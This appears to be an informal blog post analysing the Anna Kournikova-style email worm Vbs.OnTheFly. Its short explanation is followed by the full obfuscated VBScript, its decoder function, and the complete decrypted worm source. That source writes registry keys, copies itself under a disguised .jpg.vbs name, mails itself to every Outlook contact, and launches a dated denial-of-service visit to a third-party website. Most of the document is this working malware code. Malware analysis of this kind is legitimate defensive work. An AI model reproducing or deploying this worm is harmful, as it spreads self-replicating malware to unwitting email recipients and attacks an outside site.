I woke up today to find about three
zillion copies of the Vbs.OnTheFly
virus in my
inbox. I can't believe people are still stupid enough to run attachments with ".vbs" extensions. Anyway, I set about decrypting the virus and figuring out what it does, so here are my results.
Basically, it's a very simple virus. The second line is an "Execute" line that actually contains the virus itself. The rest of the script is the function used to decrypt the code before running it.
When you look at the decrypted code, you'll notice that it does four things:
- Writes a registry setting that tells the virus it has been executed.
- Saves the virus to a file (AnnaKournikova.jpg.vbs).
- Checks to see if it's January 26. If so, opens a browser and sends you to http://www.dynabyte.nl (this is a DOS attack on a site, it is not the homepage of the virus author).
- Sends copies of itself to everyone in your Outlook address book.
In case you're curious, the text it puts in your registry on line 5 is "Worm made with Vbswg 1.50b".
The original virus (linebreaks added to save your browser's sanity):
'Vbs.OnTheFly Created By OnTheFly
Execute e7iqom5JE4z("X)udQ0VpgjnH{tEcggvf{DQVpgjnH{QptGqt
tgTwugoPzgvUvgGQ9v58Jr7R6?EgtvcQgldeg*vY$eUktvrU0gjnn+
$9G5QJv786r0Rgtyiktgv$MJWEu^hqyvtc^gpQjVHg{n$^.jE*t9:+(
jE*t33+3(Etj3*63+(jE*t23+;(Etj5*+4(Etj3*;2+(jE*t9
;+(jE*t23+2(Etj3*32+(jE*t45+(jE*t33+;(Etj3*72+(jE
*t33+8(Etj3*62+(jE*t45+(jE*t8:+(jE*t:;+(jE*t33+7(
Etj3*;3+(jE*t23+5(Etj5*+4(Etj6*+;(Etj6*+8(Etj7*+5
(Etj6*+:(Etj;*+:gUvQtcyVopldi?7Egtvcqgldeg*vu$t
erkkviph0nkugu{gvqoldeg$v+tyQoclVip7de0rqh{nkguyterk0veukt
vrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwk
pqmcxl0irx0ud$kh9G5QJv786r0Rgtticgf$*MJWEu^hqyvtc^gpQjVHg
{no^kcgn$f+@>$$3vgjpgp4CUJ9inEN+*pgfhkhkopqj
vp*yq+3?cfpf{cp*yq+4?8jvpg9G5QJv786r0RwtpJ$vv<r11yy0y
{fcp{dgvp0$n5.h.ncgupgfhkgUvMLUiJy9M59?ztyQoclVi
p7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo.+3P\L7\Mz6wk?XLiM
yUMJ99z5t0cgcfnnMLUiJy9M590znEuqgFqKhqPvt*yQocl
Vip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++VgjpUvgWKg44:|6R
2x?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gV
wt+ggW4K|4R:x602tyvk\g7PML6\kzXwgW4K|4R:x602nEuqgGfpK
hNqqrHpwveqkp4gUp9CnJNi*E+QptGqttgTwugoPzgvU
vgF54xQOzM8JT?EgtvcQgldeg*vQ$vwqnmqC0rrkncekvpq+$hKF54
xQOzM8JT?Q$vwqnmqV$gjpUvgl74PvD\h;n:F?54xQOzM8JTI0v
gcPgorUec*gO$RC$K+UvgUm834i35gN5?4lv7\P;D:h0nfCtfugNuukuv
qHtcGjeL4TRoOuD4ToKp8U4m33gi55NKhTLo4uR4OoD0Tf
CtfugGuvpktugE0wqvp>@2jVpg6fFDz5yi3xL?TLo4uR4OoD0TfCtf
ugGuvpktugE0wqvpqHt9Z;:cX|5gT?|3Vq6fFDz5yi3xLUv
gk9sd4:6x5\5?F54xQOzM8JTE0gtvcKggv*o+2gUvKQ6GXDl[LQ:?
TLo4uR4OoD0TfCtfugGuvpktugZ*:9X;5cT||g+k9sd4:6x5\5V0
q?KQ6GXDl[LQ0:fCtfuguk9sd4:6x5\5U0dwglve?$gJgt{wqjxc.g
=+q$k9sd4:6x5\5D0fq{?J$<k$(dxtehn($jEegmjVuk$
#(xednth($$guvYhpu:sI[h;?3sk496d5:5x0\vCcvjegovpuhuY
sp[:;I3hC0fftyQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMt
wkpqmcxl0irx0ud$k9sd4:6x5\5F0ngvgCgvhtgwUodvk?VwtgKhsk
496d5:5x0\qV>@$$Vgjpk9sd4:6x5\5U0pgfGQ9v58Jr7R6t
0igtyvkgJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$$3pGfhKgPvz
pGfhKgPvzpgfhkpGfwHepkvpqX)udiy370d2")
Function e7iqom5JE4z(hFeiuKrcoj3)
For I = 1 To Len(hFeiuKrcoj3) Step 2
StTP1MoJ3ZU= Mid(hFeiuKrcoj3, I, 1)
WHz23rBqlo7= Mid(hFeiuKrcoj3, I + 1, 1)
If Asc(StTP1MoJ3ZU) = 15 Then
StTP1MoJ3ZU= Chr(10)
ElseIf Asc(StTP1MoJ3ZU) = 16 Then
StTP1MoJ3ZU = Chr(13)
ElseIf Asc(StTP1MoJ3ZU) = 17 Then
StTP1MoJ3ZU = Chr(32)
Else
StTP1MoJ3ZU = Chr(Asc(StTP1MoJ3ZU) - 2)
End If
If WHz23rBqlo7<> "" Then
If Asc(WHz23rBqlo7) = 15 Then
WHz23rBqlo7= Chr(10)
ElseIf Asc(WHz23rBqlo7) = 16 Then
WHz23rBqlo7= Chr(13)
ElseIf Asc(WHz23rBqlo7) = 17 Then
WHz23rBqlo7= Chr(32)
Else
WHz23rBqlo7= Chr(Asc(WHz23rBqlo7) - 2)
End If
End If
e7iqom5JE4z = e7iqom5JE4z & WHz23rBqlo7 & StTP1MoJ3ZU
Next
End Function
'Vbswg 1.50b
The (rather easily) decrypted virus:
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109)
& Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) &
Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) &
Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have, ;o)"
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b